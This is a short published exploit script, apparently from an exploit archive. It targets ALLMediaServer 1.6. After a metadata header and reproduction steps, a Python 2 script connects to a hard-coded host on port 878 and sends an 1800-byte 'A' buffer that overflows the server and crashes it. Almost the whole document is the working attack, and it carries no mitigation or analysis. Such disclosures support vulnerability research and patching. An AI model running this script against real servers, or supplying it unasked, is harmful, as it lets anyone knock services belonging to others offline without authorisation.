# Exploit Title: ALLMediaServer 1.6 Remote Buffer Overflow
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-03-25
# Vendor Homepage: https://www.allmediaserver.org/
# Software Link : https://www.allmediaserver.org/LiveUpdate/ALLMediaServer.exe
# Tested Version: 1.6
# Vulnerability Type:  Buffer Overflow (DoS) Remote
# Tested on OS: Windows 7 x86 - Windows 10 x64

# Description: ALLMediaServer 1.6 Remote Buffer Overflow

# Steps to reproduce:
# 1. - ALLMediaServer 1.6 listening on port 888 or can be changed to 878
# 2. - Run the Script from remote TCP/IP
# 3. - Mediaserver.exe Crashed


import socket

print("######################################################")
print("# ALLMediaServer 1.6 Remote (BUffer Overflow)        #")
print("#   	        --------------------------           #")
print("#               BY  Yehia Elghaly                    #")
print("######################################################")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect(('192.168.1.99', 878))
	evilbuffer = "A" *1800
	s.sendall(evilbuffer)
	data = s.recv(1024)
	s.close()
	print "Media is Out"
except socket.error, msg:
	print ""
	print "Couldnt connect with Mediaserver - Crashed"